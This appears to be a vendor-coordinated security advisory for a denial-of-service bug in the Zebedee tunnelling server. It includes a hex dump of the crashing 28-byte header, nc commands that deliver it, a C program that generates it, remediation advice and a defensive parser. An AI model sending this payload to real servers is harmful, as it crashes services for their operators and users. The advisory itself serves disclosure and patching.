We have found a denial of service vulnerability in Zebedee. This issue has been fixed in 2.4.1A.

[TESTED ON]

Zebedee 2.4.1 (Windows version and source-compiled Linux version)

[VULNERABILITY]

The server crashes when "0" is received as the port number in the protocol option header.

    $ od -tx1z -Ax zebedeeDoS
    000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
    000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
    00001c

The 9th and 10th bytes of the header (the port request field) contain 0x00.

The listening port is open before the header is sent and refuses connections afterwards:

    $ nc -vv -z -w2 zebedeehost 11965
    zebedeehost [192.168.xxx.xxx] 11965 (?) open
     sent 0, rcvd 0
    $ nc -vv zebedeehost 11965 < zebedeeDoS
    zebedeehost [192.168.xxx.xxx] 11965 (?) open
     sent 28, rcvd 2
    $ nc -vv -z -w2 zebedeehost 11965
    zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
     sent 0, rcvd 0
    $

In zebedee.c, please look at the function makeConnection(), which is called from server() (lines 1703-1706):

    /* Sanity check */

    assert(host != NULL && port != 0);

Here, if the port number is "0", both the child and the parent process appear to quit running. This issue occurs when "allowed redirection ports" are not set (the default).

[SOLUTION]

1) Upgrade Zebedee to 2.4.1A.

or

2) Setting up allowed redirection ports will also address this issue.

[SAMPLE EXPLOIT]

mkZebedeeDoS.c

    /*
     * $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
     * $ ./mkZebedeeDoS > zebedeeDoS
     * $ nc targethost port < zebedeeDoS
     */
    #include <stdio.h>

    int main(int argc, char **argv)
    {
        /* 28-byte Zebedee protocol option header with a zero port request */
        unsigned char data[] = {
            0x02, 0x01,                                     // protocol version
            0x00, 0x00,                                     // flags
            0x20, 0x00,                                     // max message size
            0x00, 0x06,                                     // compression info
            0x00, 0x00,                                     // port request: value = 0x0
            0x00, 0x80,                                     // key length
            0xff, 0xff, 0xff, 0xff,                         // key token
            0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
            0x00, 0x00, 0x00, 0x00                          // target host address
        };

        /* write the raw bytes to stdout so they can be redirected into a file */
        fwrite(data, 1, sizeof data, stdout);
        return 0;
    }

[DISCOVERED BY]

International Network Security, Inc.
Mitsuaki Shiraishi
Tomoki Sanaki
Mutallip Ablimit
-----------------
International Network Security, Inc.
Shiraishi.M <shiraishi@xxxxxxxxxx>
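As an added illustration of the fix side (this is not Zebedee's own code), the following parser reads the 28-byte option header laid out in the sample above and refuses a zero port request per connection instead of letting an assert abort the whole server; it also applies an allowed-port list, mirroring the "allowed redirection ports" workaround. The 16-bit big-endian field widths are an assumption taken from the byte comments in mkZebedeeDoS.c.

```c
/* Added example, not Zebedee's own code: a defensive parser for the
 * 28-byte protocol option header shown in the advisory. Field widths and
 * big-endian byte order are assumed from the byte comments above. A zero
 * port is refused for that connection only, instead of aborting the
 * server the way assert(port != 0) in makeConnection() does. */
#include <stdint.h>
#include <stddef.h>

#define ZB_HDR_LEN 28

struct zb_hdr {
    uint16_t version, flags, max_msg, compress, port, key_bits;
    uint32_t key_token, target_addr;
    uint8_t  nonce[8];
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }
static uint32_t be32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}

/* Returns 0 when the header is acceptable, -1 if truncated, -2 if the
 * requested port is 0, -3 if an allow-list is configured and the port is
 * not on it (the "allowed redirection ports" workaround from [SOLUTION]). */
int zb_parse_header(const uint8_t *buf, size_t len,
                    const uint16_t *allowed, size_t n_allowed, struct zb_hdr *h)
{
    size_t i;
    if (len < ZB_HDR_LEN) return -1;
    h->version  = be16(buf);      h->flags    = be16(buf + 2);
    h->max_msg  = be16(buf + 4);  h->compress = be16(buf + 6);
    h->port     = be16(buf + 8);  h->key_bits = be16(buf + 10);
    h->key_token = be32(buf + 12);
    for (i = 0; i < 8; i++) h->nonce[i] = buf[16 + i];
    h->target_addr = be32(buf + 24);
    if (h->port == 0) return -2;           /* the crash trigger in 2.4.1 */
    if (n_allowed == 0) return 0;          /* no allow-list: any non-zero port */
    for (i = 0; i < n_allowed; i++)
        if (allowed[i] == h->port) return 0;
    return -3;
}

/* The 28 bytes from the advisory's od dump (port field = 0x0000). */
const uint8_t zb_advisory_header[ZB_HDR_LEN] = {
    0x02,0x01, 0x00,0x00, 0x20,0x00, 0x00,0x06, 0x00,0x00, 0x00,0x80,
    0xff,0xff,0xff,0xff, 0x0b,0xd8,0x30,0xb3,0x21,0x9c,0xa6,0x74, 0x00,0x00,0x00,0x00
};
```

A server built this way logs and drops the offending client while the listener stays up, which is also the behaviour to verify after upgrading.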